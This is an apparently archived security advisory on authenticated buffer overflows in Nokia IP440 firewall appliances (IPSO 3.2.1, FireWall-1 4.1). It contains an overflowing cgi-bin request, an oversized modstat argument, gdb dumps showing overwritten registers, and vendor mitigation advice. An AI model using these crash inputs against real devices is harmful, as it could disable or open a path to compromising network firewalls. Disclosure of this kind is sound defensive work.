COMMAND

    Nokia firewalls

SYSTEMS AFFECTED

    Nokia firewalls

PROBLEM

    'K2' found  following.   He unwrapped  his shiny  new Nokia  IP440
    integrated Firewall-1/IDS appliance and thought to give it a  once
    over.  It  appears to be  a older FreeBSD  kernel + some  firewall
    (checkpoint 4.1) + some IDS (ISS) + remote admin (SSH/http).

    Now  these  vulnerabilities  all  require  an  authenticated user,
    however, it's still  amazing that a  device with security  as it's
    primary function would have so many issues.

    A request to it's default http administration site...

        http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main

    will result  in "Html_gen  exited because  of signal: Segmentation
    fault".   After  this,  any  attempt  to  connect to the site will
    return, "Error while getting page: Couldn't connect to /tmp/xsets:
    No such file or directory"

    The /bin/xpand will die, dumping core in /var/tmp...

        scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        Modified in 1997, 1998 by Nokia IP Inc.
        There is absolutely no warranty for GDB; type "show warranty" for
        details.
        GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
        Foundation, Inc.
        Core was generated by `xpand'.
        Program terminated with signal 11, Segmentation fault.
        #0  0x10046fb6 in ??
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        (gdb) file xpand-11.27.2000-094458
        Reading symbols from xpand-11.27.2000-094458...done.
        (gdb) bt
        #0  0x10046fb6 in end
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        #1  0xefbfd3b8 in end
            (41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
        #2  0x10047110 in end
            (7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
        #3  0x10044233 in end
            (7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
        #4  0x100446df in end
            (5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
        efbfd444)
        #5  0x1004416c in end
            (3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
        #6  0x1004732e in end
            (321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
        10044713)
        #7  0x100441ac in end
            (332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
        #8  0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
        #9  0x21983 in handle_template_request (d=0x34000,
            request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
            request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
        xcommit.c:1053
        #10 0x22d6a in stream_set (
            fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
        xpand.c:179
        #11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
        #12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
        ---Type <return> to continue, or q <return> to quit---
        #13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
        1)
            at xpand.c:385
        (gdb) info reg
        eax            0x41414141       1094795585
        ecx            0x41414141       1094795585
        edx            0x0      0
        ebx            0x1004f060       268759136
        esp            0xefbfd394       0xefbfd394
        ebp            0xefbfd394       0xefbfd394
        esi            0x7d380  512896
        edi            0x41414141       1094795585
        eip            0x10046fb6       0x10046fb6
        ps             0x10206  66054
        cs             0x1f     31
        ss             0x27     39
        ds             0xefbf0027       -272695257
        es             0x80027  524327
        (gdb)

    also....

        scrooge:/var/tmp# gdb -c html_gen.core
        (gdb) info reg
        eax            0x88dc   35036
        ecx            0xfffffffc       -4
        edx            0x4949   18761
        ebx            0x1009b060       269070432
        esp            0xefbfaa74       0xefbfaa74
        ebp            0xefbfaa84       0xefbfaa84
        esi            0x0      0
        edi            0x41414141       1094795585
        eip            0x10084d1b       0x10084d1b
        ps             0x10216  66070
        cs             0x1f     31
        ss             0x27     39
        ds             0x27     39
        es             0x27     39
        (gdb)

    also,

        scrooge:/var/tmp# ./modstat -n
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        Type     Id Off Loadaddr Size Info     Rev Module Name
        modstat: LMSTAT: Bad file descriptor
        Segmentation fault (core dumped)
        (gdb) info reg
        eax            0x4      4
        ecx            0xefbfcfb8       -272642120
        edx            0xefbfcfb8       -272642120
        ebx            0x0      0
        esp            0xefbfd354       0xefbfd354
        ebp            0x41414141       0x41414141
        esi            0xffffffff       -1
        edi            0x3      3
        eip            0x41414141       0x41414141

    This  was  tested   with  IPSO  scrooge   3.2.1-fcs1  releng   849
    11.24.1999-102644 i386 FW-1, 4.1 SP2.

SOLUTION

    Nokia is  aware of  this issue.   This is  a bug,  yes it  will be
    fixed very quickly but this  is not a major vulnerability,  you do
    need a  logon to  the box.   If this  logon was  obtained  through
    covert measures then you have bigger problems than this bug!

    Recommendations:

        1. Do not allow  Voyager access from untrusted  networks (e.g.
           the Internet).
        2. Use  good  generally  accepted practice regarding  password
           selection and confidentiality (as always).
        3. Consider disabling monitor (read-only administrator) access
        4. Use the provided SSH with port redirection (IPSO 3.2.1  and
           earlier) or embedded  SSL (IPSO 3.3  and later) to  encrypt
           http  traffic  to  Voyager  to  prevent  an  attacker  from
           eavesdropping to hear the password.

    A good FireWall-1 rule set to implement recommendations 1-4  might
    look something like:

        Source / Dest / Service / Action
        --------------------------------------------------------------
        admin-group / firewalls / [http,] ssh / Accept
        management-console / firewalls / fw1-group / Accept
        Any / firewalls / Any / Drop

    The first rule permits administrative access.  The second provides
    FireWall-1  management  access  for  the  machine  acting  as  the
    management  console  (and  is  only  referenced if Properties have
    been   modified   to   no   longer   accept   FireWall-1   Control
    Connections).  The  third excludes all  other traffic directly  to
    the firewalls, and is referred  to by Check Point as  the "stealth
    rule".

    With these appropriate rules,  an attacker must meet  the criteria
    established in your  FireWall-1 security policy  and then also  be
    authenticated as an administrator before he can attempt to  attack
    the Voyager-related processes.